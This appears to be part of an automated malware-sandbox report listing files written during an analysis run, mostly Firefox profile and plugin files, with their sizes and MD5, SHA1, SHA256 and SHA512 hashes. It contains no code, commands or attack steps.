MD51c601dcb633a5a1ad3d903a746cf7e2e
SHA16d10ea6cbedab7320c3e1f806d65c9b869105c11
SHA256960670b325ad49c1bf269c9816f2c254fa5371f96b3ad7371c5150c49591a3c7
SHA5124c692251958acc9ed91170cd327644886d965802778558f0dd7894943cbb3d8dfc990f1ffc2549782503f72a97718469e37dee495adc89e8fef02601e2325cf7
-
Filesize
240KB
MD5fdd55ad9190ca9a56c0d400d65b7504f
SHA1cd2e1d9636fa035ec3c739a478b9f92bf3b52727
SHA25679c986fd9c87542256a607eff10f5a2f84165b08bd9dd161e2d33e213607b487
SHA512bea47ea7099e6922ffa60442e3f7010fdffa86e37a020e2fc30502b42a76ad5fbfd9780af988742b398fb9487744d4095912183157aa89ae40f31492b76e95cb
-
Filesize
4.5MB
MD5f0a8d70133d24e01a0988f692ac1f18d
SHA128f7ff1ba6dcb47018a33f364303f8dcaf362a67
SHA2568d490549fd996897d7333c1d9a6e6ce220432b147582f4e174f8cc427c338559
SHA51254559c608af47cb2863493dfbe952cfde2d42a8a6ddab59836d3e1aa8c6d939b2851bddc6f5c9b5fca94e9ae24d986b928d7b3e08b86e630c1b520313c286889
-
Filesize
4.3MB
MD54ea661c85a082117e59ea78f2f140a1c
SHA149940f31bc96b08d70c1ef56d010ea320f9bbb74
SHA256389d6b90d016366fbe93940d9e4cc9594a5491c408cdc803766397012aee1a3a
SHA512df3444c2a93ca62572d0f5640ece177973a3f9750952cc9d415d3dc03a0c14f66d3ce3d35f3c0ff44480809be8bf9218ae50cbddeeb4486e8850213a9330a394
-
Filesize
1.1MB
MD596fa728730da64d7d6049c305c40232c
SHA13fd03c4f32e3f9dbcc617507a7a842afb668c4de
SHA25628d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93
SHA512c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe
-
Filesize
1.8MB
MD5d127c329efff5000e6f0d89c1e9b466a
SHA1cffdf46c13351b3026f6aa7d97b18ad5e7dce355
SHA25650e6f94e802b6787eb81845d6d947c37093057db3724f9973e0dc456df76729d
SHA512b1fb07a58adfb0200ad60ecf17eb6d8a76f236ced349277c109f898bd3c27b85c59a9f3eb9327e3cec9ef1ffd1bbd3280969b6655a1078101a55499aed54b0bf
-
Filesize
5.4MB
MD5c442de9eda228967ecc5519bbea2c07d
SHA1546191da8d80f6367dd0b743e986399052b63142
SHA2568c7fda2a4b26d0c1a5f83096b4b27894bde05d8356d2611612a0d02d2e3be9fb
SHA512d33672098823dc81fe79716a35378d3c1eceb22357c8313f1b68d0c4cf82a29b622f2c919ab82f9ee08d3af1452240887083fe7a214e6a47830189b4f221daa6
-
Filesize
712KB
MD519cc136b64066f972db18ef9cc2da8ca
SHA1b6c139090c0e3d13f4e67e4007cec0589820cf91
SHA256d20816d1e73f63beaea4bee9afc4388d07b7235a3a332674e969b646cc454597
SHA512a3e5f486289d49978ad4e76c83667ba065efe0d061de7c9b4a88b68a167a7ac0e09d850583e15f274862880dcb6f76c51586bbc4be53419d403a0c7a3ce14434
-
Filesize
717B
MD522277f1a4a5433250e947afe643771b3
SHA13177c28b9c150b27c19735d2ff0f3771bd5c04e5
SHA2568a85512e1dc0f653802c6bb87176bfa09d294c2cba5b0f670183d508d3d8be0c
SHA512d39cbc89b885fe61199c8070cc5d8cbcab53738aaab48128c4eff7fbd8a20ab202667e3ba0ba4d7fe0295787eba61b8163fc2e70aa359fd4494f4249847ba2bc
-
Filesize
442KB
MD585430baed3398695717b0263807cf97c
SHA1fffbee923cea216f50fce5d54219a188a5100f41
SHA256a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA51206511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1
-
Filesize
6.5MB
MD5438c3af1332297479ee9ed271bb7bf39
SHA1b3571e5e31d02b02e7d68806a254a4d290339af3
SHA256b45630be7b3c1c80551e0a89e7bd6dbc65804fa0ca99e5f13fb317b2083ac194
SHA512984d3b438146d1180b6c37d54793fadb383f4585e9a13f0ec695f75b27b50db72d7f5f0ef218a6313302829ba83778c348d37c4d9e811c0dba7c04ef4fb04672
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXR9LTPWD6M26Y7O4X8E.temp
Filesize7KB
MD509fd56f53cdac79f6e70220125f63204
SHA195155ca2687c3675907525bc4595f13830b918e6
SHA256ef9940d72831b8578526ae39b05c8a90468cd0b0b21df51312e82c00f61eaa21
SHA5120e5f6b1e45526beaf3fac700e13805b9b8d7cb77fbce5104ce9abe5459fb43dd5c7c149c3e5e28f467e188dc4d2ea87de2a1a1f3c6b3ef9de18094edc27661fa
-
Filesize
931B
MD5fa57b260181d357c59ad137c9d5bddbf
SHA19510451d68cc9bbd995579ddd722bf5b8ed2bc8c
SHA256219df133615a7e5f5775e31309fca439bd8a79f83fe87fce92e30f1ad39b8693
SHA51281f04e9fd9c4db25cb5d5304fdf51f63beb09f30b638615774039534056091e0e567e23fb064eb8a64085251a54b75d6637bcc5949d3ad04056e3e9adf7cdec7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD593ea704f8914fff5185ce93fb3abd0ba
SHA1dd164c3d8946ad683b1f4fb78f0397115dd663e2
SHA256383054d4d22c74dce60a15c226f1c9d293faff4411dc551eaa74d58fe1499f16
SHA51256516a9984a62a33768e7a2afa2083b8a71e1ce61c2b1c94c82435ad8f842d1662eb25b9e5f56ea7641c82a3b7f917c512d610753c0883076222b56ab02c1904
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\38ecd045-d4a0-47f4-9baf-f82f87791911
Filesize12KB
MD59f510af8971f2b525f4904db5cd36ed6
SHA12ed7a21610daaccb3992024c19c83eabfe420b1d
SHA2566e876862815b3d822d0cfe3004a46600911f873c17520633f94be455f3a23dae
SHA51263c5bc83a5fdb4c98c709c68fc634f80b523a7d42eaa3b047db4d4ffab9b1f2a21503b960199bc9b84f25bf0fc88305d7144e5936cf1374658a9fa975f2df88b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\datareporting\glean\pending_pings\44ad7177-ee6e-47b1-9a27-feaf9c35faf3
Filesize745B
MD546b7d4387e9ee297f21e11b2fd6082ba
SHA12ca5d73b752279e02bd771f8ca0476abb71175aa
SHA256f81a2c5c8ddf78f37346492c5b98d822c71ae11e618cd2f86357f8786979b90d
SHA5127d5497f8442e14058d5501fed10870182fa8065e9861216eec392b5d58475ce682dedcd4822cd595d2ab4444b643fbe51367a75e2436c61fde86435e7d91fc35
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.dll
Filesize997KB
MD5fe3355639648c417e8307c6d051e3e37
SHA1f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA2561ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA5128f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-gmpopenh264\1.8.1.1\gmpopenh264.info
Filesize116B
MD53d33cdc0b3d281e67dd52e14435dd04f
SHA14db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\LICENSE.txt
Filesize479B
MD549ddb419d96dceb9069018535fb2e2fc
SHA162aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA2562af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA51248386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\manifest.json
Filesize372B
MD56981f969f95b2a983547050ab1cb2a20
SHA1e81c6606465b5aefcbef6637e205e9af51312ef5
SHA25613b46a6499f31975c9cc339274600481314f22d0af364b63eeddd2686f9ab665
SHA5129415de9ad5c8a25cee82f8fa1df2e0c3a05def89b45c4564dc4462e561f54fdcaff7aa0f286426e63da02553e9b46179a0f85c7db03d15de6d497288386b26ac
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll
Filesize10.2MB
MD554dc5ae0659fabc263d83487ae1c03e4
SHA1c572526830da6a5a6478f54bc6edb178a4d641f4
SHA25643cad5d5074932ad10151184bdee4a493bda0953fe8a0cbe6948dff91e3ad67e
SHA5128e8f7b9c7c2ee54749dbc389b0e24722cec0eba7207b7a7d5a1efe99ee8261c4cf708cdbdcca4d72f9a4ada0a1c50c1a46fca2acd189a20a9968ccfdb1cf42d9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.lib
Filesize1KB
MD5688bed3676d2104e7f17ae1cd2c59404
SHA1952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA25633899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA5127a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\gmp-widevinecdm\4.10.2449.0\widevinecdm.dll.sig
Filesize1KB
MD5dea1586a0ebca332d265dc5eda3c1c19
SHA129e8a8962a3e934fd6a804f9f386173f1b2f9be4
SHA25698fbbc41d2143f8131e9b18fe7521f90d306b9ba95546a513c3293916b1fce60
SHA5120e1e5e9af0790d38a29e9f1fbda7107c52f162c1503822d8860199c90dc8430b093d09aef74ac45519fb20aedb32c70c077d74a54646730b98e026073cedd0d6
-
Filesize
6KB
MD5680f3739e31bf3ebded35565719967ae
SHA170fbbca1ef1c61d9e2f8fd6eca9f90b0d0fc36f7
SHA256293ca3fdc863e0528fa8916a524050e40969a553c4fc99d4f12388fc82bc89c2
SHA51206b52227411c8034fba002089bcf7474a4f28b88b501326e5f446ca88975baf75757cb1912fbdf4551299e7a36bfcdd894464b728132425319799f6dc8818e89
-
Filesize
7KB
MD58dbab889b659058bc94aac0d8938911c
SHA1dce34c19f0840d5a4421e00ac8c5e3c20d3095a9
SHA256767814a36248982fad6329e9d272504a034805f0f10bfaf1b4c152fb80fcbd84
SHA5123125d2e34c9e81619e1523cab74c2f0569a35a1900eede50d7908623bcf8ffc52f421477a66f6cf5f1575dd4213f9e808033c86a16fce4ddf8632936c09c930a
-
Filesize
7KB
MD54aa7a310185d8e3152f852520bf3538b
SHA15c84e9002fcc0ea92b4801706f7433e11fd6ff37
SHA25616a0c80b9e599bce534dbe16b90025ca588f0b4be87e58dc06b61c4384ff60fd
SHA512af46461aea061781775d6caacaf419db2637319aacc7fbbd7170fad2485a891cc38113f355e96f311c2deced9bd327be9575dcf054796d0d7a1cd26a7aabdc93
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bhg31lui.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD5be55a97c738ea75d76e787a62e595f2b
SHA1355917899ba8349b9f789b9faa635a0ff3eef176
SHA2567821034e6b623ac56c2570230fe4bfeb68566b9e681235466de5c9123ff78206
SHA512957ed5954a4c5f797c5ef58648cc2b66e8a55625ac7c6bc3b1d06e770239244b2d2bb9189f0b8daf81361e386e612b3fcc9e4305b1759fabdc9813db42e6c964
-
Filesize
1.8MB
MD589431b16b25281a50a173f359ecbcebf
SHA1a5931bc59fd615f199461eb009262d26ff34c814
SHA25678d33d02042213510b32b2c13599a33d000cc66fd295714300a557872cfc125e
SHA512498c9a04ef7a5e60d249207dc25db7e3f38dc4339be10702a02d5c922ec30be0b254c8a55552642c1540aeec6dfa26de49a7abd7f65d7a6978352720d9adb7f2
-
Filesize
2.9MB
MD5b826dd92d78ea2526e465a34324ebeea
SHA1bf8a0093acfd2eb93c102e1a5745fb080575372e
SHA2567824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b
SHA5121ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17